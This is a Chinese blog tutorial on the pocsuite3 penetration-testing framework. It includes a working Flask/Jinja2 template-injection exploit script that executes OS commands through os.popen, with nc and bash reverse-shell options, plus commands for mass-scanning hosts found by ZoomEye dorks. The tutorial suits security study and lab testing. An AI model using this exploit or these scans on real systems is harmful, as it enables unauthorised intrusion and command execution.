pocsuite3 工具使用

最新推荐文章于 2025-02-28 19:45:23 发布
最新推荐文章于 2025-02-28 19:45:23 发布
阅读量4.4k 收藏 31
点赞数 6
分类专栏: python知识体系 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43650289/article/details/110871097
版权

目录

描述

功能介绍

使用

环境

下载

应用

Pocsuite命令行模式

pocsuite3 编写POC脚本

批量验证方式

pocsuite3 编写EXP脚本

pocsuite3 反弹shell 形式

pocsuite3 编写console 形式

PocSuite3从Seebug加载PoC文件

PocSuite3从ZoomEye加载多个测试目标

PocSuite3从Shodan加载多个分析目标

POC注意事项

Windows下Pocsuite写日志url带冒号报错问题

描述

PocSuite3是知道创宇404安全研究团队设计的一款远程漏洞测试以及PoC开发框架,该框架使用了功能极其强大的概念验证引擎,并自带了大量渗透测试以及安全分析功能。

功能介绍

1、PoC脚本能够以attack、verify和shell等多种模式运行;

2、自带插件生态系统;

3、 可从本地文件、Redis和数据库等不同来源动态加载PoC脚本;

4、 可从CIDR、本地文件、Redis、数据库、Zoomeye和Shodan等来源加载多个测试目标;

5、 轻松导出测试结果;

6、 支持命令行工具和Python包导入;

7、 支持IPv6;

8、 支持全局HTTP/HTTPS/SOCKS代理;

9、 提供了强大的爬虫API;

10、整合Seebug;

11、整合ZoomEye;

12、整合Shodan;

13、整合Ceye;

14、等等…

使用

PoC脚本能够以attack、verify和shell等多种模式运行

自带插件生态系统;

可从本地文件、Redis和数据库等不同来源动态加载PoC脚本;

可从CIDR、本地文件、Redis、数据库、Zoomeye和Shodan等来源加载多个测试目标;

环境

1、 Python 3.4+

2、 Linux、Windows、macOS和BSD

下载

1.在有python环境下直接命令行pip安装pip install pocsuite3

2.Linux使用命令

wget https://github.com/knownsec/pocsuite3/archive/master.zip

unzip master.zip

3.或者在github上下载源码包提取源码https://github.com/knownsec/pocsuite3/archive/master.zip

推荐使用源码安装

应用

解压

报错   python cli.py -h

python3 cli.py -h

运行模块

--verity 验证    【POC】

--attack 攻击   【exp】

--shell

--version 版本

Request 统一请求

  --cookie
  --host
  --referer
  --user-agent
  --random-agent
  --proxy
  --proxy-cred
  --timeout
  --retry
  --delay
  --headers      extra headers (e.g."key1:value1\nkey2:value2")

Account Token 接口

  Telnet404 account options
  --login-user
  --login-pass
  --shodan-token
  --censys-uid

 Modules 一些模块接口

  --dork (默认为zoomeye搜索搜索引擎)
  --dork-zoomeye 搜过关键字
  --dork-shodan 搜索关键字
  --dork-censys 搜索关键字
  --max-page 多少页
  --search-type  搜索类型选择API,Web or Host
  --vul-keyword seebug关键词搜索
  --ssv-id seebug漏洞编号
  --lhost shell模式反弹主机
  --lport shell模式反弹端口
  --comparison 比较两个搜索引擎

optimization 选择项

  --plugins 加载插件
  --pocs-path     poc地址
  --threads      开启线程      
  --batch      自动默认选项
  --requires      检测需要安装的模块
  --quiet     没有logger
  --ppt   隐藏敏感信息

console 模式

  python3 console.py进入console模式
  Global commands:
        help  帮助
        use <module>  使用模块
        search <search term> 搜索模块
        list|show all   显示所有模块
        exit 退出
  Module commands:
        run  使用设置的参数运行选中的脚本
        back 返回上一步
        set 参数名 参数值(当前模块)
        setg 参数名 参数值(所有模块)
        show info|options|all 打印information,options
        check 使用--verify模式
        attack 使用--attack模式
        exploit 使用--shell模式

比如:

python3 cli.py -r pocs/ecshop_rce.py --dork ecshop --threads 5
 

将使用ZoomEye搜索ecshop并使用ecshop_rce.py探测,指定线程数量为5

Pocsuite的运行模式默认是verify验证模式,此时对目标影响最小,也有attackshell模式,对目标进行相关攻击与shell反弹(当然需要PoC的支持,Pocsuite的PoC编写格式预留了这三种模式的接口,并且有很多内置API帮助实现这三种接口)

Pocsuite命令行模式

Pocsuite有两种交互模式,一个是命令行模式类似我们所知的sqlmap的界面,另一个是控制台交互模式类似w3af或者matasploit的界面。

verify和attack两种POC模式

 

在使用Pocsuite的时候,我们可以用--verify参数来调用_verify方法,用--attack参数来调用_attack方法。

def _attack(self):
    result = {}
    #Write your code here
    return self.parse_output(result)

def _verify(self):
    result = {}
    #Write your code here
    return self.parse_output(result)
  • verify 模式:验证目标是否存在漏洞
pocsuite3 -r tests/poc_example.py -u http://www.example.com/ --verify
  • attack 模式:向目标发起有效的攻击
pocsuite3 -r tests/poc_example.py -u http://www.example.com/ --attack
  • 批量验证,将url写到一个txt
pocsuite3 -r test/poc_example.py -f url.txt --verify
  • 加载 tests 目录下的所有 PoC 对目标进行测试(可以充当扫描器角色)
pocsuite3 -r tests/ -u http://www.example.com --verify
  • 使用多线程,默认线程数为1
pocsuite3 -r test/ -f url.txt --verify --threads 10

这里以flask模板注入漏洞为例:

https://blog.youkuaiyun.com/weixin_43650289/article/details/110871326

pocsuite3 编写POC脚本

主要编写poc定义的函数部分去做验证;

poc-flask.py 脚本

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']
    vulDate = '1.1'
    createDate = '1.1'
    updateDate = '1.1'
    references = ['flask']
    name = 'flask'
    appPowerLink = 'flask'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        flask
    '''
    samples = []
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self):
        result = {}
        path = "?name="
        url = self.url + path
        #print(url)
        payload = "{{22*22}}"
        #print(payload)
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            return 
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

      加载目标target, 进行操作执行

-f  url_file(多个url) 比如:1.txt  存放多个IP 进行批量验证

-r 加载poc文件

-u 路径地址

--verify  poc验证模式

python3 cli.py -r /root/桌面/flask/poc-flask.py -u http://127.0.0.1:5000 --verify

否则不存在

批量验证方式

root@kali:~/桌面/pocsuite3-master/pocsuite3# python3 cli.py -r /root/桌面/flask/poc-flask.py --dork "server:http" --vuln-keyword "flask"

搜索漏洞关键字flask,  http协议的网址

失败,没扫出来

pocsuite3 编写EXP脚本

主要编写exp定义的函数部分去做攻击;

exp-flask.py 脚本

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']
    vulDate = '1.1'
    createDate = '1.1'
    updateDate = '1.1'
    references = ['1.1']
    name = 'flack'
    appPowerLink = 'flack'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        
    '''
    samples = []
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        output = Output(self)
        result = {}

    def _attack(self):
        result = {}
        path = "?name="
        url = self.url + path
        #print(url)
        cmd = self.get_option("command")
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("'+cmd+'").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        #print(payload)
        try:
            resq = requests.get(url + payload)
            t = resq.text
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ","")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = payload
        except Exception as e:
            return
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

payload如下:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}


root@kali:~/桌面/pocsuite3-master/pocsuite3# python3 cli.py -r /root/桌面/flask/exp-flask.py -u http://127.0.0.1:5000 --attack --command ifconfig
 

进行command 命令执行,使用exp

 

 

pocsuite3 反弹shell 形式

python3 cli.py -r /root/桌面/flask/exp-flask.py -u http://127.0.0.1:5000 --attack --shell

帮助中心

 

pocsuite3 编写console 形式

root@kali:~/桌面/pocsuite3-master/pocsuite3# python3 console.py 

与MSF 命令差不多

 

PocSuite3从Seebug加载PoC文件

PocSuite3从ZoomEye加载多个测试目标

PocSuite3从Shodan加载多个分析目标

POC注意事项

  • 参照模版来写:模版地址
  • 引入基础库,尽量避免第三方库。
  • 比较好POC符合:
  • 随机性:检测的数据,发送的数据要随机。
  • 通用性:考虑适应版本,各种不同的情况,操作系统等。
  • 确定性:准确率的问题,这个POC一定能检测出漏洞来吗?
  • 关于CEYE的使用:监视服务以进行安全测试

有时一些漏洞的检测并没有数据回显,如SQL盲注,如命令执行无回显等等。这时可以借助DNS查询nslook或者curl来监控数据。CEYE为我们提供了这样一种服务,地址:http://ceye.io。

Windows下Pocsuite写日志url带冒号报错问题

报错描述

Windows平台使用Pocsuite,当输入的url带有:的时会报错,如下:

[WARNING] unable to create output directory 'C:\Users\Administrator\.pocsuite\output\127.0.0.1:8080'

错误分析

原来保存日志记录会选取C:\Users\Administrator\.pocsuite\output\拼接上url地址,而windows下文件名不允许含有:,所以才会报错。

所以,不论URL是http://还是带有冒号都会报错,看来pocsuite这边在创建这个文件名的时候名没有检查文件名字是否还有特殊符号呀。

错误解决

手动改代码解决问题:反向追踪哪个文件做了创建文件夹的操作。

经查找,发现该操作代码存在于pocsuite\lib\controller\controller.py文件。

从131行代码开始,定义了一个_setRecordFiles()函数,该函数会创建这么一个文件夹。

def _setRecordFiles():
    for (target, pocname, pocid, component, version, status, r_time, result) in kb.results:
        if type(status) != str:
            status = status[1]
            target=target.replace(":","_") #这里添加了一行替换代码
        outputPath = os.path.join(getUnicode(paths.POCSUITE_OUTPUT_PATH), normalizeUnicode(getUnicode(target)))

可以发现_setRecordFiles()函数从kb.results这个数据实例里面取值。我们用target=target.replace(":","_")来将:替换成"_",问题解决。

工具| PocSuite 使用介绍
qq_40907977的博客
06-16 1228
(1)什么是POC? 答:POC是用来验证漏洞是否存在的一段代码,经常对漏洞做检测的同学对写POC这件事应该不陌生吧哈哈。 (2)框架有什么用? 答:通常我们写POC除了考虑它的通用性以外,还会考虑批量化,线程等。POC写多了需要规范管理和使用,于是框架应运而生了。我们可以写一个POC框架,帮助我们实现批量化和线程输出报告等等其他功能,这样我们就可以专心写POC的代码而不需要考虑其他问题。写一个框架当然不是简单的事情,所以可以先拿别人的框架来使用,必要的时候做二次开发,实在不好再自己写也不迟哈。 (3)关于
网络安全工具pocsuite使用教程
SHELLCODE_8BIT的博客
10-18 1295
使用pocsuite -h 获得支持的命令如下所示。会显示如下内容,可以看到自定义poc目录为。
win10安装sqlmap_Pocsuite3的安装和使用及poc代码的学习
weixin_42123456的博客
12-28 1520
简 介:Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。你可以直接使用 Pocsuite 进行漏洞的验证与利用;你也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架;同时,你还可以在你的漏洞测试工具里直接集成 Pocsuite,它也提供标准的调用类。Pocsuite3是完全由Python3编写,支持Windows/Linux/M...
pocsuite3安装及使用
m0_52051132的博客
03-09 4268
pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。
Pocsuite3的安装与使用
npc88888的博客
03-14 832
attack 模式获取命令行参数执行并返回结果。访问docker的ip和端口就能访问靶场了。然后就是搭建 docker 靶场测试了。现在可以愉快的练习exp啦。安装docker容器。验证完后删除镜像文件。
Pocsuite3工具介绍
m0_58001548的博客
05-30 1815
Pocsuite3 基于 Python3 开发,可以运行在支持 Python 3.7+ 的任何平台上,例如 Linux、Windows、MacOS、BSD 等。2021 年 11 月,Pocsuite3 通过了 Debian 官方的代码及合规检查,正式加入 Debian、Ubuntu、Kali 等 Linux 发行版的软件仓库,可以通过 apt 命令一键获取。
pocsuite3使用
qq_44657899的博客
01-04 3044
文章目录安装使用基本参数调用ZoomEye API从Seebug调用pocConsole模式 安装 安装有两种方式 1,使用pip安装 pip install pocsuite3 不过这种方式安装的pocsuite3我不会使用,于是卸载了用第二种方式安装 2,使用地址安装 如果是windows的话直接用浏览器下载然后解压即可 地址:https://github.com/knownsec/pocsuite3/archive/master.zip linux可以用命令下载 wget https://githu
Poc框架:Pocsuite3简介、安装、基本使用
热门推荐
汗的博客
12-03 1万+
简介 pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。 项目地址 https://github.com/knownsec/pocsuite3 漏洞测试框架 Pocsuite3 采用 Python3 编写,支持验证,利用 及 shell 三种插件模式,你可以指定单个目标或者从文件导入多个目标,使用单个 PoC 或者 PoC 集合进行漏洞的验证或利用。可以使用命令行模式进行调用,也支持类似 Metaspolit 的交互模式进行处理,除此之外,还包含了一些基本的如输
Pocsuite3使用方法
最新发布
03-31
### Pocsuite3使用方法 #### 工具简介 Pocsuite3 是一款功能强大的渗透测试框架,主要用于漏洞验证、Web 应用程序安全评估以及自动化攻击模拟。其设计目标是帮助安全研究人员快速开发并运行 PoC (Proof of ...
如何打造自己的PoC框架-Pocsuite3-使用
晓得哥的博客
04-25 2785
相比于无聊的用法介绍,我更想说一下Pocsuite3为什么会有这些功能以及是如何实现的。如果你也想制造一款类似的工具Pocsuite3的一些思想或许能够帮助到你。本文同时也是记录Pocsuite3开发过程中的一些思考与理解。 简介 Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了我们的 Web...
Pocsuite安全扫描工具原理和使用说明
02-21
可能需要检查是否有错误的地方,比如安装命令是否正确,是否真的是使用pocsuite3,因为之前有段时间Pocsuite3是更新后的版本。还要确认是否支持异步模式,或者插件机制,比如导出结果到报告等。 可能用户需要具体的...
pocsuite3pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试框架
02-05
pocsuite3 法律免责声明 未经事先双方同意,使用Pocsuite攻击目标是非法的。 pocsuite仅用于安全测试 法律免责声明 事先事先双方同意,使用pocsuite攻击目标是非法的。 pocsuite仅用于安全测试目的 总览 pocsuite3是由开发的开源远程漏洞测试和概念验证开发框架。 它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。 产品特点 PoC脚本可以以不同的方式在attack , verify , shell模式下运行 插件生态系统 从任何位置(本地文件,redis,数据库,Seebug ...)动态加载PoC脚本 从任何位置(CIDR
开发实战(7)--渗透测试pocsuite3框架二开
记录开发和安全学习过程中的点点滴滴
05-29 1267
Pocsuite3是一款开源的远程漏洞测试框架。Pocsuite3由知道创宇404实验室开发,旨在提供一个高效、灵活的平台,用于远程漏洞扫描和利用。该工具自2015年开源以来,经过不断的更新和迭代,已成为安全研究人员和渗透测试人员的重要工具.下面是两篇对Pocsuite3详细利用的介绍文章,如果需要进一步使用的朋友可以看下面的两篇文章,本篇文章金介绍对框架的二开
渗透测试框架之PocSuite3
Stephen8848的博客
02-28 748
这是一款知道创宇的开源渗透测试框架,通过pocsuite3-Github-开源链接即可获取。关于产品更细致的介绍,请到Pocsuite3官网了解更多。关于这个漏洞,可以通过phpStudy远程RCE漏洞复现这篇文章了解更多,本文也就不过多赘述了。打开phpstudy默认探针页面。
生命在于学习——初识pocsuite3框架
易水哲的博客
10-16 2122
本篇文章记录的是pocsuite3框架
使用Pocsuite3
weixin_44110913的博客
08-18 1391
简介和安装 在此框架下,有编写其POC的指定规则 以CMSEasy5.5的SQL注入漏洞PoC为例 1、首先创建.py文件,命名规则: PoC命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成_. 文件 例子的.py文件名为:_88979_cmseasy_5_5_sql_injection.py 2、PoC如下: poc参考地址 #导入所写PoC所需要类/文件,尽量不要使用第三方模块。 #迫不得已使用第三方模块有其依赖规则,后面给出。 from poc
关于pocsuite使用
weixin_30509393的博客
12-20 622
0x00 前言 pocsuite的用处就不多说了,早些时候也看到黑哥和余弦大佬在微博上说zoomeye 和pocsuite升级了。 结合最近自己在审计cms,也想收集一下其他cms的poc,比如chybeta大佬的cmsPoc,还有Lucifer1993大佬的AngelSword,用pcosuite重新写一下poc,同时自己审出来的一些"0day"也是可以用这个框架。 0x0...
【实用工具Pocsuite使用
Zt_Zk的博客
08-30 578
pocsuite是一款基于漏洞与POC的远程漏洞验证框架,记录基本使用和POC跟EXP编写的学习记录
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值